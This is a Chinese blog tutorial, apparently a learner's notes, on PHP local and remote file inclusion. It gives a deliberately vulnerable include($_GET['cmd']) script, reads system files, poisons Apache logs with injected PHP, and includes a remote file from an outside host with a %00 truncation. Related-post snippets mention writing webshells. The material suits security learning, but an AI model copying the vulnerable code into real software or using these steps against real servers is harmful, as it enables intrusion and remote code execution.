7.17-文件包含漏洞(1)

最新推荐文章于 2025-08-21 17:21:55 发布
最新推荐文章于 2025-08-21 17:21:55 发布
阅读量710 收藏 10
点赞数 18
CC 4.0 BY-SA版权
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2403_88556277/article/details/149428157

本地文件包含

以www文件为例,我们在里面创建一个include.php文件

<?
include($_GET['cmd']);
?>

include()常见的文件包含函数之一,

$_GET['cmd'] 采用get方式获取参数cmd,例如url/include.php?cmd=...

在这后面加你想要打开的文件

然后,我们也可以创建一个木马文件phpinfo.php

<?php
phpinfo()
?>

我们可以试着打开这个文件,在同一目录下直接打开就行了,想用直接路径也可以

然后这个文件你也可以写其他内容,比如helloworld或者一句话木马

文件格式也可以是tx和jpg这些其他格式,只要内容是php代码就行,include函数并不在意文件是什么格式,内容有php代码,就可以解析

ok,因此我们可以利用本地文件包含漏洞读取一些本地系统的敏感信息

例如C:\windows\system.ini

包含Apache日志文件

当我们访问本地服务器时,apache日志便会记录

而当我们访问一个不存在的文件时也会被记录

比如 127.0.0.1/<?php phpinfo()?>

但是会被编码,当我们再次访问时,可以通过bp抓包将编码修改回去,并再次发送日志便会正确记录php代码,再次访问便可以执行

远程文件包含

首先我们得改一下php配置,打开php.ini

 如果有off就改成On,这样include/require函数是可以加载远程文件的,这种漏洞被称为远程文件包含

实际操作的话,需要远端服务器,就不操作了

就是在本地有个上面include.php这样的文件,可以在远端web服务器上某一目录下创建一个phpinfo.php这样的文件建议后面加一个截断符,这样就可以成功读取

127.0.0.1/include.php?cmd=http://192.168.0.1/include/phpinfo.php%00123

今天就到这,加油

村民级别
关注
Confluence漏洞学习——CVE-2021-26084/85,CVE-2022-26134漏洞复现
记录并分享学习安全的知识点..
07-24 3249
​ Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码。 ​.........
ES 文件浏览器安全漏洞分析(CVE-2019-6447)
晓得哥的博客
02-28 3193
作者:0x7F@知道创宇404实验室 时间:2019.02.27 0x00 前言 ES 文件浏览器(ES File Explorer File Manager application)是一款安卓系统上的文件管理器,它支持在手机上浏览、管理文件。有超过 1 亿次下载量,是目前安卓系统上使用得最广的文件管理器。 2019年1月,由国外安全研究者公开一个关于 ES 文件浏览器的安全漏洞(CVE-2019...
Kibana任意文件包含漏洞(CVE-2018-17246)
EC_Carrot的博客
07-07 989
漏洞详细 Kibana是一个开源的分析与可视化平台,设计出来用于和Elasticsearch一起使用的。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。如果能够上传一个文件,就能够包含该文件来执行代码。 漏洞复现 首先在靶机内创个代码文件,以便后续操作 #echo '...code...' > /tmp/vulhub.js export default {asJson: function() {return require("child_proc
CVE -2022-26134漏洞复现(Confluence OGNL 注入rce漏洞)
qq_17754023的博客
06-04 5559
Atlassian ConfluenceAtlassian Confluence是一个专业的企业知识管理与协同软件,主要用于公司内员工创建知识库并建立知识管理流程,也可以用于构建企业wiki。其使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。因此,该系统被国内较多知名互联网企业所采用,应用范围较广,因此该漏洞威胁影响范围较大。 0x02 漏洞概述Atlassian Confluence存在远程代码执行漏洞,攻击者可以利用该漏洞直接获取目标系统权限。...
修复 K8s SSL/TLS 漏洞(CVE-2016-2183)指南
热门推荐
KubeSphere
02-21 2万+
测试服务器配置主机名IPCPU内存系统盘数据盘用途2440200Ansible 运维控制节点41640200+20041640200+20041640200+2002840200+2002840200+2002840200+200harbor2840200Harbor合计822843202800测试环境涉及软件版本信息2.8.203.3.0v1.24.19.5.17.17.52.5.1
Elasticsearch漏洞汇总比较全
weixin_50464560的博客
08-23 6154
本测试环境同时运行了Tomcat和ElasticSearch,Tomcat目录在/usr/local/tomcat,web目录是/usr/local/tomcat/webapps;之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。我们的目标就是利用ElasticSearch,在/usr/local/tomcat/webapps目录下写入我们的webshell。
Confluence远程命令执行漏洞(CVE-2024-21683)
swordheart的博客
05-17 314
Atlassian公司的Confluence软件存在远程命令执行漏洞(CVE-2024-21683),攻击者可通过该漏洞获取服务器权限。受影响版本包括Confluence Data Center和Server的多个版本,从7.17.0到8.9.0。漏洞利用需要攻击者拥有管理员权限,并通过上传恶意JavaScript文件执行任意命令。漏洞利用过程包括获取Atlassian Token、管理员登录、认证以及上传恶意文件。
【CVE-2022-26134】Confluence OGNL RCE 漏洞
weixin_45742777的博客
09-09 8522
【CVE-2022-26134】Confluence OGNL RCE 漏洞
【风险预警】Confluence Wiki OGNL注入漏洞(CVE-2022-26134)
murphysec的博客
06-04 4682
6月4日,墨菲安全实验室监测发现Atlassian修复了Confluence Server 和 Confluence Data Center 中的OGNL注入漏洞。Atlassian Confluence是企业常用的wiki系统,攻击者无需认证可利用漏洞在Confluence Server 或 Confluence Data Center 系统中执行任意代码。CVSS评分为9.8分,评级为严重,按照官方描述该漏洞受影响版本为:所有受支持的 Confluence Server 和 Confluence Dat
elasticsearch-7.17.4-windows-x86-64
02-19
从文件名称列表中的“ES-7.17.4”可以推断出,这个压缩包中包含的文件是与Elasticsearch的7.17.4版本有关的。Elasticsearch的版本号通常由三部分组成,即主版本号、次版本号和修订号,这样的设计使得用户可以清楚地...
最新版windows logstash-7.12.0-windows-x86_64.zip
03-30
1. **Logstash 架构**: Logstash 采用输入(Input)、过滤(Filter)和输出(Output)三部分架构。输入插件负责从各种源获取数据,如日志文件、网络端口、数据库等;过滤插件则对数据进行清洗、转换和标准化,以...
Logstash 7.17.6 版本发布 - 强大的开源数据收集引擎
在过滤阶段,Logstash 使用一组插件对收集到的数据进行处理,包括数据格式化、数据过滤等。最后,在输出阶段,数据将被发送到存储系统、搜索系统或其他目的地。Logstash 的这种灵活的数据处理流程使其成为数据整合的...
实践项目-1
ettamei的博客
08-19 1105
判断是否有安装好了没,或者是输入mysql,弹出mysql>这样就是安装好了,同样安装应用也是在/usr/bin中哟。然后可以在你创建的工程中的某一个目录中创建一个index.php文件,之后php 运行起来,查看是否能成功。这里我使用etta的账号远程登录了,不过展示出来的目录直接就是根目录,好家伙,修改错了,那我不得重新装系统。这里我安装的时候没有找官网,而是在Linux中输入的mysql,会提示你没有,但是你可以安装对应的版本。这里我连接ftp一直失败,一直用的是root账号,也就以为是配置的问题。
传统方式部署(RuoYi-Cloud)微服务
2402_88627342的博客
08-18 760
官方下载地址:https://archive.apache.org/dist/skywalking/java-agent/下载地址:https://github.com/alibaba/Sentinel/releases/tag/1.8.8。下载地址:https://nodejs.org/download/release/v22.15.1/下载地址:https://nacos.io/docs/latest/overview/下载地址:https://download.redis.io/releases/
MyCAT完整实验报告
2401_87853424的博客
08-18 827
刚刚看了一下前面的那篇MyCAT的文章 感觉有一些问题 所以拿出一篇文章再说一下 单独构建了完整的实验环境 这样会全面一点‍弥补了上一期的MyCAT的不完整 所以 这次 做了了一个相对来说完整的 包括怎么配置等等 其实还想写分库分表的 但理了一下思路 好像在这篇文章去说的话 就会很多了 所以 下篇文章去完整去说好了 更新的评论越来越慢 但也没办法 博主尽量像写的详细易懂一点 OK 希望大家生活是幸福的 知道自己为了什么努力 下期再见!!!‍。
Stellio Player:安卓设备上的个性化音乐播放器
2501_90259289的博客
08-19 676
Stellio Player作为一款专为安卓设备设计的音乐播放器,以其简洁流畅的设计和丰富的功能,为用户提供了个性化的音乐播放体验。Stellio Player是一款功能强大、操作便捷的安卓音乐播放器,提供了丰富的音乐播放功能和个性化设置,满足从初学者到音乐爱好者的各种需求。- 多种音乐格式支持:支持多种常见的音乐格式,如MP3、WAV、FLAC、AAC等,确保用户可以播放各种类型的音乐文件。- 云同步功能:支持云同步功能,用户可以将播放列表和设置同步到多个设备,确保在不同设备上都能享受一致的音乐体验。
bypass webshell--Trait
fatsheep8_5的博客
08-19 761
源码这个代码他将a-》get到的值传递给了c,然后get_declared_tarits这个函数他是获取trait这个的所有定义的东西,get_declared_traits — 返回所有已定义的 traits 的数组():getmygid()i。
Android】悬浮窗清理
最新发布
每天不是在写bug就是在写bug的路上
08-21 227
悬浮窗清理
迅为RK3562开发板Android修改uboot logo
mucheni的博客
08-20 160
本文档配套资料在网盘资料“iTOP-3562 开发板\02_【iTOP-RK3562 开发板】开发资料\07_Android 系统开发配套资料\05_Android 修改 uboot logo 配套资料”路径下。我们如果想要替换这个 logo,首先要制作一个新的 logo.bmp,图片属性和默认的logo.bmp 要一样,width,height 都为偶数,否则会出现颠倒异常。我们将制作好的 logo 替换 android 源码 kernel-5.10/下的 logol.bmp 即可。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值